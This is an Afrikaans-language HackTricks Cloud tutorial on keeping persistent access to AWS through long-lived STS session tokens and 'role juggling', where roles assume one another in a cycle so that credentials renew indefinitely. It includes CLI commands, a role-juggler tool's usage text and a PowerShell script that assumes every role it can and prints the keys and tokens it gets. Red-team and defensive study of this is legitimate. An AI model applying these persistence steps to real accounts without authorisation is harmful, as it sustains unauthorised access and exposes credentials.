Afrikaans - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - STS Persistence

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

STS

Vir meer inligting besoek:

AWS - STS Enum

Veronderstel rol token

Tydelike tokens kan nie gelys word nie, dus om 'n aktiewe tydelike token te handhaaf is 'n manier om volharding te handhaaf.

aws sts get-session-token --duration-seconds 129600

# Met MFA
aws sts get-session-token \
--serial-number <mfa-device-name> \
--token-code <code-from-token>

# Hardeware toestelnaam is gewoonlik die nommer van die agterkant van die toestel, soos GAHT12345678
# SMS toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:sms-mfa/username
# Virtuele toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:mfa/username

Rolketting Jonglering

Rolketting is 'n erken AWS kenmerk, dikwels gebruik vir die handhawing van stil volharding. Dit behels die vermoë om 'n rol te veronderstel wat dan 'n ander veronderstel, moontlik om terug te keer na die aanvanklike rol op 'n sikliese wyse. Elke keer as 'n rol veronderstel word, word die vervalveld van die geloofsbriewe verfris. Gevolglik, as twee rolle gekonfigureer is om mekaar wederkerig te veronderstel, maak hierdie opstelling die ewige hernuwing van geloofsbriewe moontlik.

Jy kan hierdie werktuig gebruik om die rolketting aan die gang te hou:

./aws_role_juggler.py -h
usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]

optional arguments:
-h, --help            show this help message and exit
-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]

Let wel dat die find_circular_trust.py skripsie van daardie Github-opgaarplek nie al die maniere vind waarop 'n rolketting opgestel kan word nie.

Kode om Rol Jonglering vanaf PowerShell uit te voer

```powershell # PowerShell script to check for role juggling possibilities using AWS CLI

Check for AWS CLI installation

if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) { Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." exit }

Function to list IAM roles

function List-IAMRoles { aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json }

Initialize error count

$errorCount = 0

List all roles

$roles = List-IAMRoles | ConvertFrom-Json

Attempt to assume each role

foreach ($role in $roles) { $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) try { $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json if ($credentials) { Write-Host "Successfully assumed role: $($role.RoleName)" Write-Host "Access Key: $($credentials.AccessKeyId)" Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" Write-Host "Session Token: $($credentials.SessionToken)" Write-Host "Expiration: $($credentials.Expiration)"

Set temporary credentials to assume the next role

$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey $env:AWS_SESSION_TOKEN = $credentials.SessionToken

Try to assume another role using the temporary credentials

foreach ($nextRole in $roles) { if ($nextRole.Arn -ne $role.Arn) { $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) try { $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json if ($nextCredentials) { Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" Write-Host "Access Key: $($nextCredentials.AccessKeyId)" Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" Write-Host "Session Token: $($nextCredentials.SessionToken)" Write-Host "Expiration: $($nextCredentials.Expiration)" } } catch { $errorCount++ } } }

Reset environment variables

Remove-Item Env:\AWS_ACCESS_KEY_ID Remove-Item Env:\AWS_SECRET_ACCESS_KEY Remove-Item Env:\AWS_SESSION_TOKEN } else { $errorCount++ } } catch { $errorCount++ } }

Output the number of errors if any

if ($errorCount -gt 0) { Write-Host "$errorCount error(s) occurred during role assumption attempts." } else { Write-Host "No errors occurred. All roles checked successfully." }

Write-Host "Role juggling check complete."

</details>



<details>

<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kontroleer die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag. 

</details>
PreviousAWS - SSM PerssitenceNextAWS - Post Exploitation

Last updated